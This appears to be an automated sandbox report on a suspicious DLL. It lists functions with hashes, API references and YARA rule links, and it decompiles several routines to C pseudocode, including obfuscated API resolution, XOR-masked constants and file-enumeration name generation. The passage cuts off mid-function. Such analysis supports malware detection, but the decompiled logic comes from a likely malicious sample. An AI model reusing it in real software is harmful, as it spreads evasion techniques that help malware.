Instruction ID: 198fc6f13b2c205f28735a15415a1de04c7e0b1ddd4a3ef4e0ba0a2212813bf9
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 0811B1733412049FE754CE99DCD1E9373AAEB99330B258166ED04CB301E636E842CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E181238, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.593689385.000000006E180000.00000040.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: ac9d21443ebc7af7f811819af157f2aba13275964115553332e662971ae6b77c
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: EC01D2773542018FD748CB6DD994D6AB7E5EBD5324B39807EC456C7615E220E889CE20

Uniqueness

Uniqueness Score: -1.00%

Function 6E1492FA, Relevance: 19.8, APIs: 13, Instructions: 289timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E149335

Part of subcall function 6E14B752: __getptd_noexit.LIBCMT ref: 6E14B752

__gmtime64_s.LIBCMT ref: 6E1493CE
__gmtime64_s.LIBCMT ref: 6E149404
__gmtime64_s.LIBCMT ref: 6E149421
__allrem.LIBCMT ref: 6E149477
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E149493
__allrem.LIBCMT ref: 6E1494AA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1494C8
__allrem.LIBCMT ref: 6E1494DF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1494FD
__invoke_watson.LIBCMT ref: 6E14956E
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E14957D
__aulldiv.LIBCMT ref: 6E14959D

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 2599720210-0
Opcode ID: 06929933a419cd7f593819ebb6fe92a2bc4413f0a05dcbfb85437b43d8504806
Instruction ID: 8bebc798a1c78b99b29b9fe6c0cfac6b85252d5e6e7d4b3a6a6e290efc34e235
Opcode Fuzzy Hash: 06929933a419cd7f593819ebb6fe92a2bc4413f0a05dcbfb85437b43d8504806
Instruction Fuzzy Hash: 6B91C7B1A00707EBE714DFF9DD61B9A73ACAF05328F24466AE514DB780E770D9809B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E15DCDC, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6E15DCF3

Part of subcall function 6E14B167: __calloc_impl.LIBCMT ref: 6E14B176

__calloc_crt.LIBCMT ref: 6E15DD17
_free.LIBCMT ref: 6E15DD25
__calloc_crt.LIBCMT ref: 6E15DD33
_free.LIBCMT ref: 6E15DD43
_free.LIBCMT ref: 6E15DD49
__copytlocinfo_nolock.LIBCMT ref: 6E15DD58
__setmbcp_nolock.LIBCMT ref: 6E15DD79
_free.LIBCMT ref: 6E15DD87
___removelocaleref.LIBCMT ref: 6E15DD8E
___freetlocinfo.LIBCMT ref: 6E15DD95
_free.LIBCMT ref: 6E15DD9B

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 061d87b3231f02325b8bd5ae5fdd004d3426fadf22026c3297dd86e04e29b3a8
Instruction ID: 8b06022ef0df786b08cca816cdef8a1e6953294491a6714439d11324f78f2f32
Opcode Fuzzy Hash: 061d87b3231f02325b8bd5ae5fdd004d3426fadf22026c3297dd86e04e29b3a8
Instruction Fuzzy Hash: AC2107B5104205EEE7619BE5DC04E8B77EDEF82BA4F214839E464553A4FB2194E0FF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E14AD06, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6E14AD0E
_free.LIBCMT ref: 6E14AD27

Part of subcall function 6E14AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E14DD47,00000000,00000001,00000000,?,?,?,6E14A62D,6E148593), ref: 6E14AB31
Part of subcall function 6E14AB1D: GetLastError.KERNEL32(00000000,?,6E14DD47,00000000,00000001,00000000,?,?,?,6E14A62D,6E148593), ref: 6E14AB43

_free.LIBCMT ref: 6E14AD3A
_free.LIBCMT ref: 6E14AD58
_free.LIBCMT ref: 6E14AD6A
_free.LIBCMT ref: 6E14AD7B
_free.LIBCMT ref: 6E14AD86
_free.LIBCMT ref: 6E14ADAA
RtlEncodePointer.NTDLL(6E28E390), ref: 6E14ADB1
_free.LIBCMT ref: 6E14ADC6
_free.LIBCMT ref: 6E14ADDC
_free.LIBCMT ref: 6E14AE04

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: f19f2e799b37aea24c0e0eecfae58976737c2d64c06ae237d8dced8df92403e6
Instruction ID: 9b307a10032e932dc7c993eccd15528fd8c227b66317d732f657ab1525b9dd44
Opcode Fuzzy Hash: f19f2e799b37aea24c0e0eecfae58976737c2d64c06ae237d8dced8df92403e6
Instruction Fuzzy Hash: 31218632901A25DBEF50AF94D884D5A3B6ABB277A1322053DE86557340E7346CC4FFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E10195D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E10195D(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E102130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e104144;
				_push(_t15 + 0x6e10505e);
				_push(_t15 + 0x6e105054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E10212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6e104148, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e10195d
0x6e101966
0x6e10196a
0x6e101970
0x6e101975
0x6e10197a
0x6e10197d
0x6e101980
0x6e101985
0x6e101986
0x6e101989
0x6e101994
0x6e10199b
0x6e10199f
0x6e1019a1
0x6e1019a2
0x6e1019a5
0x6e1019aa
0x6e1019b4
0x6e1019b6
0x6e1019b6
0x6e1019d0
0x6e1019d4
0x6e101a24
0x6e1019d6
0x6e1019df
0x6e1019f5
0x6e1019fd
0x6e101a0f
0x6e101a13
0x00000000
0x00000000
0x6e1019ff
0x6e101a02
0x6e101a07
0x6e101a09
0x6e101a09
0x6e1019ea
0x6e1019ec
0x6e101a15
0x6e101a16
0x6e101a16
0x6e1019df
0x6e101a2c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?,?), ref: 6E10196A
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E101980
_snwprintf.NTDLL ref: 6E1019A5
CreateFileMappingW.KERNEL32(000000FF,6E104148,00000004,00000000,?,?), ref: 6E1019CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E1019E1
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1019F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E101A0D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A), ref: 6E101A16
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E101791,0000000A,?), ref: 6E101A1E

Strings

`RxtAxt, xrefs: 6E10196A

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: f37f1f201a9cdb8f51bb2ad89220c44300efe75c637ee84a17cddc507e4d6877
Instruction ID: 0a398df462d4b52934a339d8f07072e98a5c42ff27d9fa691a5d1d8923e55fda
Opcode Fuzzy Hash: f37f1f201a9cdb8f51bb2ad89220c44300efe75c637ee84a17cddc507e4d6877
Instruction Fuzzy Hash: AF2198B2600148FFDB11DFE8CC88EDE77ADEB55358F118025F615E7140DE34998AAB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E15DDB3, Relevance: 16.6, APIs: 11, Instructions: 131COMMON

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 6E15DDEC
__calloc_crt.LIBCMT ref: 6E15DE3D
__lock.LIBCMT ref: 6E15DE53
__copytlocinfo_nolock.LIBCMT ref: 6E15DE64
_wcscmp.LIBCMT ref: 6E15DE9E
__lock.LIBCMT ref: 6E15DEB5
__updatetlocinfoEx_nolock.LIBCMT ref: 6E15DEC7
___removelocaleref.LIBCMT ref: 6E15DECD
__updatetlocinfoEx_nolock.LIBCMT ref: 6E15DEEC

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 9aecd0667d5ac341f464396610e45f040f55e0a26a110a6d194c8890951c1c9e
Instruction ID: 743ed73ee66a9faa3710370870e8599c4c7caf03de6da0d3b46a6f2b9679c5fe
Opcode Fuzzy Hash: 9aecd0667d5ac341f464396610e45f040f55e0a26a110a6d194c8890951c1c9e
Instruction Fuzzy Hash: 9F41B3B2504309EFDB01DFE4D844BCE77F8AB05718F20482AE92856384CB7596E6BF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1485D7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6E1485EA

Part of subcall function 6E14A60F: std::exception::_Copy_str.LIBCMT ref: 6E14A628

__CxxThrowException@8.LIBCMT ref: 6E1485FF

Part of subcall function 6E1495D4: RaiseException.KERNEL32(?,?,6E17D110,6E17B25C,?,?,?,?,?,6E148556,6E17D110,6E17B25C,?,00000001), ref: 6E149629

std::exception::exception.LIBCMT ref: 6E148618
__CxxThrowException@8.LIBCMT ref: 6E14862D
std::regex_error::regex_error.LIBCPMT ref: 6E14863F

Part of subcall function 6E1483AB: std::exception::exception.LIBCMT ref: 6E1483C5

__CxxThrowException@8.LIBCMT ref: 6E14864D
std::exception::exception.LIBCMT ref: 6E148666
__CxxThrowException@8.LIBCMT ref: 6E14867B

Strings

bad function call, xrefs: 6E148681

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: 147a73bc3666f78423f9af009256a92835bee4188d6dee32e9cd6069130a21c7
Instruction ID: 41f54e0b82232357f280130ca390509c0a52545db499b76fdac413af93f19446
Opcode Fuzzy Hash: 147a73bc3666f78423f9af009256a92835bee4188d6dee32e9cd6069130a21c7
Instruction Fuzzy Hash: 9F11BF74C0420DFBCF00EFE4C459CDDBB7CAB04544B508966AD156B244EB34E6C99B95

Uniqueness

Uniqueness Score: -1.00%

Function 6E14DE09, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6E14DE09

Part of subcall function 6E14AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E14AF54
Part of subcall function 6E14AF51: __initp_misc_winsig.LIBCMT ref: 6E14AF6F
Part of subcall function 6E14AF51: GetModuleHandleW.KERNEL32(6E175EE8), ref: 6E150D88

__mtinitlocks.LIBCMT ref: 6E14DE0E
__mtterm.LIBCMT ref: 6E14DE17

Part of subcall function 6E14DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E151CA5
Part of subcall function 6E14DE7F: _free.LIBCMT ref: 6E151CAC
Part of subcall function 6E14DE7F: RtlDeleteCriticalSection.NTDLL(6E17D520), ref: 6E151CCE

__calloc_crt.LIBCMT ref: 6E14DE3C
__initptd.LIBCMT ref: 6E14DE5E
GetCurrentThreadId.KERNEL32 ref: 6E14DE65

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 1551663144-0
Opcode ID: 165e2620da271679a10ad36915fab87da0de37422bd03f80e28009dda002ff4b
Instruction ID: d47f59982dc4b1f037d969074d95155837fe6e0e02945482cb357137d29a7f57
Opcode Fuzzy Hash: 165e2620da271679a10ad36915fab87da0de37422bd03f80e28009dda002ff4b
Instruction Fuzzy Hash: 19F0F672509A22DDEFA4BAF07C047CF36989B22A7CB214E2AE474E53D4FF1085C17955

Uniqueness

Uniqueness Score: -1.00%

Function 6E1535FB, Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 6E153636
__invoke_watson.LIBCMT ref: 6E153690
_strlen.LIBCMT ref: 6E153644

Part of subcall function 6E14B752: __getptd_noexit.LIBCMT ref: 6E14B752

_strnlen.LIBCMT ref: 6E1536CF
__lock.LIBCMT ref: 6E1536E0
__getenv_helper_nolock.LIBCMT ref: 6E1536EB

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 0c922dfd764d68d38f26e713a40b24cdf896a82691ba27ab660b519a31fb54dc
Instruction ID: 47f646d8fed5a80aa8f5928184f2a4df6a38d1fe3f365aacf3747a733a330cbf
Opcode Fuzzy Hash: 0c922dfd764d68d38f26e713a40b24cdf896a82691ba27ab660b519a31fb54dc
Instruction Fuzzy Hash: FA3120F1A046169ADB119BF49C08BDE679C9F05754F21042AD934DF388DB74CAE27790

Uniqueness

Uniqueness Score: -1.00%

Function 6E101879, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101879(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E101072(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e104144 + 0x6e105014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E10105D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e104144 + 0x6e10519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E10145E(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e101887
0x6e10188b
0x6e10194c
0x6e101891
0x6e1018a9
0x6e1018b8
0x6e1018bf
0x6e1018c1
0x6e1018c6
0x6e101944
0x6e101945
0x6e1018c8
0x6e1018d5
0x6e1018d7
0x6e1018dc
0x00000000
0x6e1018de
0x6e1018eb
0x6e1018ed
0x6e1018f2
0x00000000
0x6e1018f4
0x6e101901
0x6e101903
0x6e101908
0x00000000
0x6e10190a
0x6e101917
0x6e101919
0x6e10191e
0x00000000
0x6e101920
0x6e101926
0x6e10192c
0x6e101931
0x6e101936
0x6e10193b
0x00000000
0x6e10193d
0x6e101940
0x6e101940
0x6e10193b
0x6e10191e
0x6e101908
0x6e1018f2
0x6e1018dc
0x6e1018c6
0x6e10195a

APIs

Part of subcall function 6E101072: HeapAlloc.KERNEL32(00000000,?,6E101303,00000208,00000000,00000000,?,?,?,6E101DD8,?), ref: 6E10107E

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E101B92,?,?,?,?,?,00000002,?,?), ref: 6E10189D
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018BF
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018D5
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018EB
GetProcAddress.KERNEL32(00000000,?), ref: 6E101901
GetProcAddress.KERNEL32(00000000,?), ref: 6E101917

Part of subcall function 6E10145E: memset.NTDLL ref: 6E1014DD

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: abcdc206e1ff19f8d32ca2ec44b72cb7b1e4382e2eb61882d8ef6355014e52fd
Instruction ID: 83fa03cd9c2f282f37824db5353b4404f12ec5dc58e3452009d9b38ccf93da02
Opcode Fuzzy Hash: abcdc206e1ff19f8d32ca2ec44b72cb7b1e4382e2eb61882d8ef6355014e52fd
Instruction Fuzzy Hash: 9821607070064BAFDB10DFB9C880EAA77ECEF553187114429E585D7211DF74EA45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E15282C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E152838

Part of subcall function 6E148902: __FF_MSGBANNER.LIBCMT ref: 6E148919
Part of subcall function 6E148902: __NMSG_WRITE.LIBCMT ref: 6E148920
Part of subcall function 6E148902: RtlAllocateHeap.NTDLL(6E28E9EC,00000000,00000001), ref: 6E148945

_free.LIBCMT ref: 6E15284B

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 15bb8655ef437321b675046f3a6af264ab1302b510bfe3f80151d0180fcc7854
Instruction ID: 9eb56cd71f1971cfb43a82e489d1386c47c9c2edfec92ed14304074a56494882
Opcode Fuzzy Hash: 15bb8655ef437321b675046f3a6af264ab1302b510bfe3f80151d0180fcc7854
Instruction Fuzzy Hash: 0111C473504615EFDFA45BF49844E8E37FCAF15365B214839FA6887384DB7488D0E690

Uniqueness

Uniqueness Score: -1.00%

Function 6E1683C5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1683FB
__isleadbyte_l.LIBCMT ref: 6E168429
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E168457
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E16848D

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 36c4ef31e035b47371935661d6fb83af9b075534530f5ff178f0f4b06d8fba7c
Instruction ID: 9582d29b72939f4acb0d223d3ab3514779a2aa85150d6c09bfe2597b497a4910
Opcode Fuzzy Hash: 36c4ef31e035b47371935661d6fb83af9b075534530f5ff178f0f4b06d8fba7c
Instruction Fuzzy Hash: 28318131604256EFEB618EA5CC44BAA7FB9FF42314F214569E8648B1A0D731D8E1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E14F67D, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E14F6A1

Part of subcall function 6E14FDC1: __fltout2.LIBCMT ref: 6E14FDEA

__cftog_l.LIBCMT ref: 6E14F6C7
__cftoe_l.LIBCMT ref: 6E14F6F9

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 90ccb8a6d0fba13973ca5cab8f78136eab913a3a61740b1b0d0724653ad27dd6
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: A9014B3244014EFBCF025EC4CC119EE3F66BB2D255B659815FA3858230D736C5B1BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E14E274, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6E14E28B

Part of subcall function 6E14E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E14E9B2
Part of subcall function 6E14E980: ___AdjustPointer.LIBCMT ref: 6E14E9C9

_UnwindNestedFrames.LIBCMT ref: 6E14E2A2
___FrameUnwindToState.LIBCMT ref: 6E14E2B4
CallCatchBlock.LIBCMT ref: 6E14E2D8

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction ID: b2ae29bcc1a372b2c78e7587a5381bd3f5c7aa4239348be374e310a5e95535cb
Opcode Fuzzy Hash: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction Fuzzy Hash: 9E01E93210010AFBDF129F95CC01EDA7FBAFF58758F114415F9186A220D772EAA1EBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6732 Parent PID: 6692 rundll32.exeCOMMON

Executed Functions

Function 0100896F, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0100896F(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x100d2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x100d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x100d2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x100d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x100d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x100d2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x100d2a4; // 0x460a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x100e7f2; // 0x73797325
				_t83 = E010093FD(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x100d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x100d2a4; // 0x460a5a8
				_t16 = _t93 + 0x100e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
